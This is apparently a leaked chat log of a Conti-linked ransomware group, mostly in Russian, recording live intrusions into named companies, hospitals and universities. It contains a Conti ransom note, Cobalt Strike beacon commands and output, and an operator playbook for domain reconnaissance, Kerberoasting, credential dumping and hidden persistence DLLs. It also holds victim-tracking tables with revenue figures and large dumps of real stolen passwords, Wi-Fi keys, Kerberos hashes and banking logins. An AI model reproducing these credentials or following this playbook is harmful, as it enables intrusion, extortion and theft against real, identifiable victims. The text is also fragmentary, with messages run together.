Cobalt Strike will make a connection to the forwarded host/port and use Beacon
to relay traffic between the two connections.
````Windows Executable (S) - RAW` - это stageless вариант, а именно когда вы делаете RAW через `Attack -> Packages -> Payload Generator` вы делаете промежуточный файл, который после запуска докачивает рабочий код самой кобы, в `Windows Executable` сразу этот рабочий код идет, без дополнительной подкачкиhiтогда до обеда работаем с ним все вместе+из сессий только MATCHES?Доброе утроВсем доброейчас спущусьВзглядомТелепатически? не испачкайтетолько аккуратно, она покрашенаБейте в дверь мощьно🗿Там забулдыгаДобра по утруБодрое утроувы( пока тихо(@tl2 по кербам тихо?(закреп не удавалось поставитьсессий нет``
otsql$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity!
ichiban$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity!
``бвот керь``
$krb5tgs$23$*admbchapman$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity!
```сесии умерли?+и пересниму разомпо всемполный отчет потом отдайтут 2фа, есть возможность сессии переснять?`adm 76.14.0.148 redwoodcity.org 192kk user8`щас зайду)не)я уж думал он ушел в мертвые т к там совсем движухи нет)где? у нас же еще третий естьменя просто напрягает что в general постоянно пишутмогу зайти)ну и кстати тебя в другом нету)ну и плюс я не совсем отсюда)втч пиндосы)тут 99 людей знает и так откуда яой блятьа у нас концерты Дельфина набережной
выставки диповых чуваков под кислотой
водка под Дядю Юрув этом рокете лишнее пишида и такой эфективный иногда)а движняк где-то далеко)а тут не
устал - налилэто в мск все там на пампе каком-то
соревновательном уровне
полном движнякеПривык что способмтвует)привык еще как)в том то и дело)разве не привык?)способствует)))как у нас всегда вцелом))у меня еще погода способствуетя тоже об этом подумываю в последнее время)но слишком стабильно прикладываюсь)и косяков нети даже все работаетне, я какбы тут
все окейну с начала декабря ужехорошо ты отдохнул)пока функционирую надо ловить момент)поеду лечиться)если до конца месяца не соскочуслезтьникак не могу с бухлачета я всеокей)и в ночь все закроютзавтра придут к 6пусть сегодня заготовятвыспятсяскажем - будут сидетьпросто выспаться хотят)тебе жалуются?)спать хотят совсемребятотпускайтам хеш будетмодулем в мсфечем можно сдамнуть учетку sa?и тпш уже нетсколько лет назад)ну да
ты вроде пусканулся ж туда не?сначала надо в сеть идтитак там из сетитут недавно)нарисовался никсовый 0д ЛПЕжив ли доступ на прод сервкакможешь на пейперсурс помотреть!!о кстати[еще этот пейперсурс ебучийесли там вебшелл вынеслиpens.com еще остался
но надо ехе чтобы его пусканутьтам еще триадметалз вроде есть если бот в сети можете взять
он бесхозныймогут заплатить могут не заплатить
это рулетка
ни от чего не зависит толкома они все в процесе...мне кажется нетпо сну они заплатят?все в работетам моих 4какие?еще ваши боты естьили вон на бекдореа смысл?снуеду сделай пока
там работы пиздец копейка((чувак оффлайн пока
будет к 22 где-то(я с ней поработаюдавай 2фа)))сделаеми скажи как остальные 3 переснять сессиину окей
если что работайте егобыл на момент отчета, а потом ушли на другие задачи)написано же)IN PROGRESSнеа, в работе только текущиесун.еду работаете?там впна больше нет по ипаку этомуже отметилда вижуглобалтранз250 мимо205.236.0.43
204.134.196.195
107.0.14.250
по этим трем переснять сессии?``
EXTERNAL INTERNAL VPN OWNER REVENUE STATUS LOG
lrhc.org lrhc.local 66.228.239.136 user8 140kk IN PROGRESS ntds, research
205.236.0.43 user4 STOPPED no valid accounts
snu.edu 204.126.2.44 user7 IN PROGRESS
204.134.196.195 user4 STOPPED 1 acc not valid, 1 acc 2fa
107.0.14.250 2fa
globaltranz.com Globalnet.local 162.42.243.250 ERROR blocked
``````
EXTERNAL INTERNAL VPN OWNER REVENUE STATUS LOG
lrhc.org lrhc.local 66.228.239.136 user8 140kk IN PROGRESS ntds, research
``показать им что нехуй сливатьсяпочему бы и нетлол, мб в хелсы камбек сделаем? он у нас соника был)спслюбуюпод 4.1она та же что и былакакую?эээможешь пока скинуть инстру по настройке кобы?я себе пометки сделаюраспиши плиз актуальное состояние еще раза что у с впнами теми которые соникволы?что то в работу есть?оверленд собирается каплямиага окей = )``
All of your files are currently encrypted.
Backups were encrypted or deleted, same as Shadow Copies.
If you try to use any additional recovery software - the files might be damaged, but if you are still willing to try - try it on the data of the lowest value.
To make sure that we REALLY CAN recover all of the encryptd data - we offer you to decrypt 2 random files of your choice completely free of charge.
The faster you reply - the easier and cheaper it will be.
To receive information on the price of the recovery software you can contact our team directly for further instructions through our website :
TOR VERSION :
(you should download and install TOR browser first https://torproject.org)
http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/
HTTPS VERSION :
https://contirecovery.best
---BEGIN ID---
W2GzoYgyg5zZYaIAHs4u2MR6UaxLrzlsyRb8qzwHbzENpcIR8KkCR8gmXgaDryRo
---END ID---
``так и так ужеприветтаргет просилв записке уберите все кроме чата и инуткрукций как туда попасть
когда заказывать будешь билдыпривету нас их нету. и кейлогер не ставитсятут я хзпри подключении клиента фортика он просит логин и пароль на сколько помнюну или быстро вырубилисьпохоже нетпосле запуска команд интерфейсы поднялись?делал так
```
beacon> shell wmic nic get name, index
[*] Tasked beacon to run: wmic nic get name, index
[+] host called home, sent: 55 bytes
[+] received output:
Index Name
0 Microsoft Kernel Debug Network Adapter
1 Intel(R) Ethernet Connection (6) I219-V
2 Intel(R) Wi-Fi 6 AX200 160MHz
3 Microsoft Wi-Fi Direct Virtual Adapter
4 Fortinet Virtual Ethernet Adapter (NDIS 6.30)
5 Fortinet SSL VPN Virtual Ethernet Adapter
6 PPPoP WAN Adapter
7 WAN Miniport (SSTP)
8 WAN Miniport (IKEv2)
9 WAN Miniport (L2TP)
10 WAN Miniport (PPTP)
11 WAN Miniport (PPPOE)
12 WAN Miniport (IP)
13 WAN Miniport (IPv6)
14 WAN Miniport (Network Monitor)
15 Bluetooth Device (Personal Area Network)
16 Microsoft Wi-Fi Direct Virtual Adapter #2
17 Broadcom NetXtreme Gigabit Ethernet
beacon> shell wmic path win32_networkadapter where index=4 call enable
[*] Tasked beacon to run: wmic path win32_networkadapter where index=4 call enable
beacon> shell wmic path win32_networkadapter where index=5 call enable
[*] Tasked beacon to run: wmic path win32_networkadapter where index=5 call enable
[+] host called home, sent: 174 bytes
[+] received output:
Executing (\\UKHOEVLT3156\root\cimv2:Win32_NetworkAdapter.DeviceID="4")->enable()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ReturnValue = 0;
};
[+] received output:
Executing (\\UKHOEVLT3156\root\cimv2:Win32_NetworkAdapter.DeviceID="5")->enable()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ReturnValue = 0;
};
```да вроде дисконект``
[03]: Fortinet Virtual Ethernet Adapter (NDIS 6.30)
Connection Name: Ethernet 2
Status: Media disconnected
[04]: Fortinet SSL VPN Virtual Ethernet Adapter
Connection Name: Ethernet 3
Status: Media disconnected
``````
Windows IP Configuration
Ethernet adapter Ethernet 3:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
Ethernet adapter Ethernet:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
Wireless LAN adapter Local Area Connection* 1:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
Wireless LAN adapter Local Area Connection* 10:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
Ethernet adapter Ethernet 2:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
Wireless LAN adapter WiFi:
Connection-specific DNS Suffix :
IPv6 Address. . . . . . . . . . . : 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0
IPv6 Address. . . . . . . . . . . : fdb0:64:3df8:0:7de6:b515:bbeb:89c0
Temporary IPv6 Address. . . . . . : 2a02:c7d:a28:5100:c889:fce9:a8e0:ab10
Temporary IPv6 Address. . . . . . : fdb0:64:3df8:0:c889:fce9:a8e0:ab10
Link-local IPv6 Address . . . . . : fe80::7de6:b515:bbeb:89c0%11
IPv4 Address. . . . . . . . . . . : 192.168.0.80
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . fe80::7e4c:a5ff:fef9:c2a0%11
192.168.0.1
``````
Host Name: UKHOEVLT3156
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.18362 N/A Build 18362
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization: MatchesFashion
Product ID: 00330-52356-69234-AAOEM
Original Install Date: 11/29/2019, 12:10:04 PM
System Boot Time: 9/18/2020, 9:20:23 AM
System Manufacturer: HP
System Model: HP EliteBook 830 G6
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 142 Stepping 12 GenuineIntel ~1600 Mhz
BIOS Version: HP R70 Ver. 01.02.01, 8/26/2019
Windows Directory: C:\windows
System Directory: C:\windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-us;English (United States)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 7,998 MB
Available Physical Memory: 850 MB
Virtual Memory: Max Size: 29,502 MB
Virtual Memory: Available: 15,235 MB
Virtual Memory: In Use: 14,267 MB
Page File Location(s): C:\pagefile.sys
Domain: matches.com
Logon Server: N/A
Hotfix(s): 5 Hotfix(s) Installed.
[01]: KB4514359
[02]: KB4513661
[03]: KB4515383
[04]: KB4516115
[05]: KB4515384
Network Card(s): 4 NIC(s) Installed.
[01]: Intel(R) Ethernet Connection (6) I219-V
Connection Name: Ethernet
Status: Media disconnected
[02]: Intel(R) Wi-Fi 6 AX200 160MHz
Connection Name: WiFi
DHCP Enabled: Yes
DHCP Server: 192.168.0.1
IP address(es)
[01]: 192.168.0.80
[02]: fe80::7de6:b515:bbeb:89c0
[03]: fdb0:64:3df8:0:c889:fce9:a8e0:ab10
[04]: 2a02:c7d:a28:5100:c889:fce9:a8e0:ab10
[05]: fdb0:64:3df8:0:7de6:b515:bbeb:89c0
[06]: 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0
[03]: Fortinet Virtual Ethernet Adapter (NDIS 6.30)
Connection Name: Ethernet 2
Status: Media disconnected
[04]: Fortinet SSL VPN Virtual Ethernet Adapter
Connection Name: Ethernet 3
Status: Media disconnected
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
Virtualization Enabled In Firmware: Yes
Second Level Address Translation: Yes
Data Execution Prevention Available: Yes
```systeminfo и ipconfigпо поводу интерфейсовКакие еще идеи?Все службы в названиях которых есть fortinet - запущены. Виртуальные интерфейсы фортинета - включал. Бесполезно. Домен не появляется.```
SSID name: "rothbarguest"
Cipher : None
SSID name: "BA53LG"
Cipher: CCMP
Cipher: GCMP
Key Content : pinkblind
SSID name : "SKYCWVNA"
Cipher : CCMP
Cipher: GCMP
Key Content : 81kwISrQXbTM
SSID name : "home"
Cipher : CCMP
Cipher : GCMP
Key Content : jake2210boy
SSID name : "BT-NGAFJ8"
Cipher : CCMP
Cipher: GCMP
Key Content : CM3NxJT63QDiLt
SSID name : "BTHub5-K3M6"
Cipher : CCMP
Cipher : GCMP
Key Content : 76cc939872
SSID name : "TALKTALK-ADE727"
Cipher : CCMP
Cipher : GCMP
Key Content : AGWGA9W6
SSID name : "BT-68A2KJ"
Cipher : CCMP
Cipher : GCMP
Key Content : VpHFa7NVYnKYub
SSID name: "Elfordleigh"
Cipher : CCMP
Cipher: GCMP
Key Content : Security12
SSID name : "SKY94FE2"
Cipher : CCMP
Cipher : GCMP
Key Content : RBPXFQEA
SSID name: "MF_Guest"
Cipher: CCMP
Cipher: GCMP
Key Content : MatchNow
``````
Louisad
M@tches2020!
```дапоймали?а че меня можно тоже тудаhenrystreet.org конфу плздо конца недели все что имется на руках закрываем и переезжаем в новый рокет``
skytechinc.com
``@user9 - готовит сеть и до сих пор не дал мне внешний домен для конфы
@user7 - #corp-televisa-com-mx
@user8 - выдал впн
@user3 - выдал впн
@user4 - выдал впн,kznm[ ](https://mediaeveryone.com/channel/general?msg=fue3bjcmbBoFoLAFL) qтак он сдохбалли мониторите фономуважаюжесткий, получаетсянифига он@user9 занят сеткой, готовит к закрытиюмне - точно не попадалсявроде?да вроде не попадалсяу них на соларе не настроен он былменеджер паролей[ ](https://mediaeveryone.com/channel/general?msg=h4E8itvspTabEgzud) эт че?#ballymoregroup-com
были креды от двух насов, один не работал
2 бэкап сервака со снятыми листингами
искали сферу
потом отвалился
первый раз вернулся, вырубили и первый нас, переменяли пароли,отвалился
потом вернулась тачка на которой нет доступа к домену, от впна ни конфигов, ни кред, стоял кейлог, ничего не поймалналичие мп проверяли?sccy собрали браузеры со ВСЕХ компов, поролей нетуже не первый день с нимипо sccy и ballymore отпишите что сделано(напомню, впн не смогу включить без кода подтверждения, у них 2фа)было в работе sccyсесия живаяотошёл от компаДавай готов новую взятьвсм ушел?если есть что взять, то возьму, у меня чел ушёл из #corp-televisa-com-mxsccyballymore отвалилсяsccyу кого что в работе?ага+все тут?ок, нужна новая
уверен что из офиса тоже никто не заходиля, но лучше смени кобуприлично такпока я с user7
остальные опаздываюткто вообще пришел?все дома спалиу своих спросил?pawbug.comа домен?моячья коба?кто то вышел
```
01/28 12:07:45 *** sup has joined.
01/28 12:10:25 *** sup has left.
```не``
sup beacon> exit
[Tasked beacon to exit
```@tl1 это ты вышел из всех сессий в кобе 172....218?hiПривет всем приветзавтра к 5login_passwdlogin_usernameв snu.edu пытаюсь из впна выбраться
чекаю на SMBGhost и еще кучу всяких рдп эксплойтов попробовал - все мимокак там на гидре соль заказать)не разбираюсь с гидройя в #corp-televisa-com-mx пытаюсь пробиться на какую нибудь тачку@user9 на дольняк пошелразбираюсь с гидройС с гидрой как брутить веб формулибо другим спосом брутануть вебс гидрой разбираемсяsccyскажите без + чем заняты)-бруть будемвсе в sccy?++sccyкто чем занят?тут= )``
На входе мы имем обычного бота с пользовательскими правами и рассматриваем первый этап работы с этого контекста.
1. Сбор информации о домен контроллерах в сети и проверка видимости домена
- net domain_controllers
- net dclist
- shell nltest /dclist:
Чаще всего хватает первой команды из трех, но если она не отдает результата - можно попробовать остальные.
2. Сбор информации о составе Active Directory при помощи AdFind.exe
- загружаем adfind.exe и adf.bat в папку доступную для записи
- переходим кобальт биконом в эту папку
- запускаем shell adf.bat
- ждем окончания работы скрипта
- выкачиваем результат и удаляем то что загрузили на машину
```писал на основе твоего гайда)да я поняля бы мог вынести адфайн + шарфайн на первые пунктыи прочей хуйния это писал с расчетом на скип ав лабчтобы быстро перепгрынуть если найдется админ шара доступнаяможно делать периодическиshell type C:\path\output.txtто смотреть через биконесли шейрфайндер идет долгоэто в словах, щас допишу это в командах``
ENTRY POINT guide
1. Сбор первичной информации о домене и об окружении
- Domain name
- DCs list
- LA\DA\EA
- Password policy
- PS
- EDR
- system info
на основе полученной инфы смотрим, что за сеть перед нами: workgroup с впн, ав лаба, рабочая сеть. Если на основе даных из шага 1 невозможно сделать вывод, переходим ко 2 шагу
2. Сбор информации об АД
- ADFind
- ADFind trust
если размер файлов суммарно составляет более 40мб, то необходимо положить их в архив. После анализа АД делаем вывод о типе сети. Если workgroup без видимости домена, пропускаем и берем след. сеть в работу. Если полноценная сеть, идем дальше
3. Сбор дополнительной информации о домене и об окружении
- Дамп браузеров
- Seatbelt
- kerberoast, asreproast
- DuzzleUP
- WinPEAS
- Watson
- GPP
- ShareFinder
все файлы в процессе и логи вы складываете в папку с именем внешнего домена сети, под именами соответствующим утилитам, которые вы запускали. Хеши для брута вы передаете team lead 2
4. Доп. действия. В процессе выполнения ShareFinder мы запускаем персист на входной точке (ТОЛЬКО ЕСЛИ ОБ ЭТОМ БЫЛО СКАЗАНО ЗАРАНЕЕ)
- генерируем НОВЫЙ билд на КАЖДЫЙ запуск
- прячем длл в пользовательких папках (желательно appdata и как можно дальше)
- запускаем, проверяем не удалило ли длл + появилась ли штаска, пишем мне: имя хоста, права запуска
все файлы дублируются в конфу, а так же складываются в отдельную папку у вас локально
```есть конечнопроеб зачетныйдаохесть 10 мин?понимаешь какой проеб?и нашли их в вцентре блять)))их просто не трогали на локея так понял через эти esixа как они восстановились не читали?а фига себеони ищут доступы ссх в есикс + рубикдаа есть планы на тему госпиталь еще раз накрыть?))окая тебе хеш скинул сюда и написал туда чтобы ты глянул сюда)ну да, я больше и не писал)а так я ж написалтак хеш в брутчто именно чекнуть?ок секв брут пожалуйста``
TicketByteHexStream :
Hash : $krb5tgs$23$*Administrator$activedirectory.fishusa.com$MSSQLSvc/Fishusa-DC.a
ctivedirectory.fishusa.com:55423*$AD57FE3D3891F5A3A264DFF456950F6C$8EA98D3AB
C059F0EFAE4925C27EDACDD3FC613D5330AE0ED5D868BC3F009402DE5A8D2673F71142F22E7E
17FBF20B865DDE95661ED0A2E02564DA4263BE403CEEFA40D587CEDC9D26F40FEF13B7FC7A9C
624A505279BEF60B84B1D4BDBF94AF3179E5A3AC11D1ABD739B2CA1044D0F593E4B5D915551E
C58D27D405C6BA305AD1E92F40F67A5217F7B7DE1667E13AC325E265682438B8CD0282C04B35
4593455C183E69922BA97727DDAA3B910FBC253726FE5EC70D533AB1EE9A282C332A37214F5F
2DB2410468E4509EEA5CC450F2EE342382B3D5AE422B5B4C5DB0ED0414D50E19B78E1F4DE0E2
5311CAD6AC3021B49124759367B078759DDD3AADF716B104266BB5AFEBB6507515675562ABE3
4278CABDA26ADF17CD9AF7B7FEFE4F717235B1388112F9C43513A72127FD21449C9BDDDE8887
79DAC70F2FF8D83CD3C329E33AFAC731DD9224BC553430850CB37FD8DD950AA04080BE6AA165
51DB03D1B165C5EDBC853ECFAF1FF28A98F766F601BC964ED64560952CE86767A7104A15122A
90307347778F1F177C1C50E814D80DFED26A60DA4998D024CEAA298234E63B7CD35F2F9621C6
46F61E1B628F7278FFE78F3044D0D03B4EA1409157C6D75C12DCBA8B029950EF2539361DA38C
782B0720EF483A314B085CA5F6309C37F549CB24B80466B842B5B784ED014902A86BFEA6D56B
1782FAB1C5611E2BBF96ACF2799E6DF9C45DF66C2CB96154F8415505920EAB91909364BBB0A8
FFA501E2C6EB7F546D4F65C1159EA747BD94B79A3E9C3BE4E899AB5058FBA0EFE6EBFF703C95
7F506BF977E8F798B07BAD10D4BDE26E792660B6873599D2F0C6F33020E2A6C7EAFE5369D982
3A842E2B941C92EBC8996E5D9D136C334F004F0A58BBEBC3916F992C6553690F79B77ED71121
49EAB80EBE9CFBC20AD4CC7E2C4B3126C51F9D6CAA09FA61F567A9CC70B97FB49DC96B4DA7E2
F8AD8EB0E0B35EFD6CFE4F9FEF796AE3A588DBD5757FA7794A5FD7A1F67BD0D1D24BE5D6E9FE
718761A919C61BD8171E37509878599A3BF73A38A538C074396A5815346AA591D61014F0E1FE
175731E561942B5B7665BB9545DA74B6998B6B3D335FBDC8B1BA3E13168F3D95324BF8AB5B00
A1EC7CE50289766C14894416EA3812E6359CF70C6F474C67D360F75B68A4630DAA0433F11D76
69020B7D2C87FC6FDF591CC3679478B6AF15BD58415271EA71071DFE9953AD6586C7BABAB3A9
467C5D0181CC953ECB572474B637C7CAFC0FBE2B7FF4AA65678E36663D3302C59486364F2611
12E90E021CEF7210B53FD516A59BE52BEBB9563822E629C00829439E08CF6DEB5FB590796892
250DA5919BED1A478E00D3901FA317A5B33DB1EDA40628C32013FAD83B9A9114380D837082E2
DDF60F2592B6CB7BA7D5E5CA0FFA5510DB7198F1361D72670F0DCA6338B17AB3CB1F354634D8
00079CFA520F87DA0E712BF8F7F0885583224148B08F99EFE55A43FB438E1FB5123F5AD6AE39
647D31DBBE82D73281790B964459FCDC5E59DC896DFC84F9B4364164291E197324721CCD4700
437E8A92D28E6501BDD0C85A555C5A872818B7BDB3F0F472112F9F8CD8C3BDE634256
SamAccountName : Administrator
DistinguishedName : CN=Administrator,CN=Users,DC=activedirectory,DC=fishusa,DC=com
ServicePrincipalName : MSSQLSvc/Fishusa-DC.activedirectory.fishusa.com:55423
``лолспокидавайи ок))))тупо переименовал hook.jar в Hook.jarнезавтра буду)вобщея спать
нет силзначитжава``
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -javaagent:Hook.jar -jar cobaltstrike.jar $*
Error opening zip file or JAR manifest missing : Hook.jar
Error occurred during initialization of VM
agent library failed to init: instrument
``продублируешь...?щабля карочну дав конфу тудаи артифакт китом поправленнымс хукомновый кобальтя ж кидалбляэто на 12 яве?в таких условиях как ты чекаешь без инетана длтам 1 детектгенерить артифакт китомя ж сказалсека блять7 у нашего который в тулспанел73у нас 1 детект ващеа почему меньше то?а вот депа поймали(и детект меньше хотя был активена вот его старый стаб не поймалиа откуда деп появился опять?без инетаhttps://dyncheck.com/scan/id/535edae924db877964d784a8713f84fc стаб депа)и потом раскидать по всем рабочим станциямнету
начать серваковей и генерьтетолько в кобешелкод билдер есть свежий?и тупо проеби мб какие-то "дежурные" заметят аномалию по пкесли их всех поднять из сна, то сам лок займет прилично временитам пкесть какие-то методы работы на скорость?слушайhttp://helpdocpt.club/threads/some-cool-stuff-%D0%A1-pws-cna.38/Раз уж меня пустили в огород - откоментил часть топиков, предлагаю мои скромные ремарки внести прямо в первое сообщение чтобы не приходилось читать весь тредможно нас в чат хоть?задание на обе командысегодня до 21:00, сделаете gpj можете уйти раньшеу вас сейчас активная практика будет как раз с прицелом на повышение прав, будут попадаться кейсы где надо будет изучать новое, где стандартные методы не будут работать, и вот их как раз следует планомерно добавлятьзапутанность я думаю не проблема, это же все таки относительный такой "порядок" действий, вопрос shortcut'а тут
то есть выделения приоритетных векторов и далее вторичных и третичных - то етсь более сложных в эксплойтации и реже встречающисяв любом случае выглядит запутаннопотому что, например, предыдущий вариант диаграмы было сложно привести к вменяемому видуДля бесконечного скорее всего придётся перейти на другую платформу, либо же преподносить в ином видеданый майндмап по сути это основа всего цикла действий возможного, то есть расширять можно чуть ли не до бесконечности)дальше просто векторно развивайте с указанием используемых уязвимостей (как LPE так и сетевых)
уделите внимание MsSql вектору тожену вцелом чем дополнять я так понимаю вы и так "видите"? но начало верное, агаСейчас сделаю))только обещай без шалостеймогу свой акк датькиньте логин в ПМ пожалуйста под которым почитать можно)ремастер mind-map'а
http://helpdocpt.club/threads/mind-map-%D0%BF%D0%BE-%D1%8D%D1%81%D0%BA%D0%B0%D0%BB%D0%B0%D1%86%D0%B8%D0%B8-%D0%BF%D1%80%D0%B8%D0%B2%D0%B8%D0%BB%D0%B5%D0%B3%D0%B8%D0%B9.33/актуалочкаhttps://www.xmind.net/download/До обеда продолжаем вчераншнюю задачу по Mindmap и организации инструкций:space_invader:hiДоброе утроВсем доброе утроpcsb.org говорятможно меня в эту самую как её `pinellas.local`и мне?[ ](https://mediaeveryone.com/channel/general?msg=AwPNpZh9xSPnH2kZE) да, в лспасибоПриветможно кобу новую
мою локнули
там две сети закрывалось:space_invader:hiвключил)сделалдаВсем приветuser8 надо включить, он вернулсяhiПривет, где все?День добрыйбвсем спокойной ночизавтра к 5но так же никуда не катятда, есть там цитриксовые админыпользакигрупы - юзаки?
или сервера?другие групы попадались?В #corp-televisa-com-mx сдвинулись со входной точки
Пока ДА нет, чекнули все сервера и тачки куда есть доступ, из юзерского сегмента серверов пока удается вылезтичто за сегодня сделали?с этим пользователем можно авторизоваться только на виртуальных лабах (других тачках не удалось авторизоваться) проверил все браузеры - чисто, пароли из gppp не подошли ни к одному из пользователей доменных, кербы снял и отправил брутиться, в силтбэлте ничего не нашёл (файлы и истории браузеров), на всех тачках перепробовал все элевейты что у меня есть (буквально все даже обход уака) шарфайндер не прокатил нигдетоже чистосейчас перечекаю на этой тачке (на прошлых 2-х всё чисто)браузеры?нетне систем права?нетты ЛА?вот я и интересуюсь что можно ещё попробовать ?разве больше вариантов нет?)остаётся тогда ждать пока сбрутится хэшик сервисадмина (adfssvcadmin)да)а твой текущий доменный пользак?как проверишь отпиши в фидбэк если не работаетснимал шарфайндер?на других тачках не получается подняться, элевейт кит не подходит, что можно попробовать? пароли (4 если считать пасс актуального пользователя) что есть ни к какому аку не подходятвсе передал на брут ужеда, оба файлакербыа ты хеши отдал @tl2?пароли ЛА не подошли, элевейты не помогли, думаю перепрыгнуть на другую тачку и там попытаться поднятьсяподбираю пароль к локальному админу``
Domain Controllers:
Server Name IP Address
----------- ----------
HSU-ADDC01 137.150.144.180
HSU-ADDC07 137.150.146.61
HSU-ADDC03-AZ 10.52.0.196
```сейчас так снимутул чейн не снимает ад_трастokв лс @tl2@tl1 @tl2 можно хэшик на брут``
[*] Tasked beacon to run .NET program: SharpChromium.exe logins
[+] host called home, sent: 690231 bytes
[+] received output:
[*] Beginning Google Chrome extraction.
--- Chromium Credential (User: MichaelLee) ---
URL : https://registration.tco.census.gov/myreg/change-password.jsf
Username : michaellee@missme.com
Password : MissRock90058
--- Chromium Credential (User: MichaelLee) ---
URL : https://id-provider.tco.census.gov/nidp/saml2/sso
Username : michaellee@missme.com
Password : MissRock90058
--- Chromium Credential (User: MichaelLee) ---
URL : https://www.ups.com/lasso/login
Username : dm1002
Password : KPN@12th
--- Chromium Credential (User: MichaelLee) ---
URL : https://www.ups.com/lasso/login
Username : dm1001
Password : KPN@12th
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : deodarmichael1
Password : sweet8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://web17.secureinternetbank.com/EBC_EBC1961/EBC1961.ashx
Username :
Password : 152994828040
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx
Username : 3180
Password : rock0058
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx
Username : 3601
Password : dm0058
--- Chromium Credential (User: MichaelLee) ---
URL : https://www.fedex.com/en-us/home.html
Username : MissMe
Password : Sweet90058!
--- Chromium Credential (User: MichaelLee) ---
URL : https://sdg2.mastercard.com/static/private-portal-ui/
Username : Mi
Password : seoul
--- Chromium Credential (User: MichaelLee) ---
URL : https://www.ups.com/lasso/login
Username : MISSMEMICHAEL
Password : !Alameda4715
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : willing1
Password : 0058sweet
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : willinglee
Password : sweet8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 3031olympicmichael
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://sellercentral.amazon.com/ap/signin
Username : AndyP@missme.com
Password : 4715Missme
--- Chromium Credential (User: MichaelLee) ---
URL : https://danceandmarvel.com/index.php/oitmain
Username : michael
Password : michael1234
--- Chromium Credential (User: MichaelLee) ---
URL : https://identity.avalara.com/account/login
Username : michaellee@missme.com
Password : Miss8040*
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 3019westmichael
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : 355kingsleymichael
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.onlinelabels.com/SignIn.aspx
Username : michaellee@missme.com
Password : sweet8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://sdg2.mastercard.com/pkmslogin.form
Username : Michael_Lee
Password : ^RcRvMiSs90058
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : rcrvmichael1
Password : Rcrv8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : missmemichael1
Password : spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : d&mmichael1
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://www.amazon.com/ap/signin
Username : patriciachoi@missme.com
Password : graceful0619
--- Chromium Credential (User: MichaelLee) ---
URL : https://www.costcobusinessdelivery.com/Logon
Username : soohkim@missme.com
Password : sweet7706
--- Chromium Credential (User: MichaelLee) ---
URL : https://login.bigcommerce.com/login
Username : lisakim@missme.com
Password : RRvdrr $4715
--- Chromium Credential (User: MichaelLee) ---
URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx
Username : 2987
Password : mm0058
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : michaelmaison
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://www.certify.com/Login.aspx
Username : michaellee@missme.com
Password : $MissRock
--- Chromium Credential (User: MichaelLee) ---
URL : https://login.yahoo.com/account/challenge/password
Username : jclmichaellee
Password : $Holy0731
--- Chromium Credential (User: MichaelLee) ---
URL : https://accounts.shopify.com/login
Username : michaellee@missme.com
Password : MissMe8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://www.amazon.com/ap/signin
Username : AndyP@missme.com
Password : 4715Missme
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : rcrvmichael1
Password : Rcrv8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : d&mmichael1
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : michaelmaison
Password : Spai8040
--- Chromium Credential (User: MichaelLee) ---
URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx
Username : missmemichael1
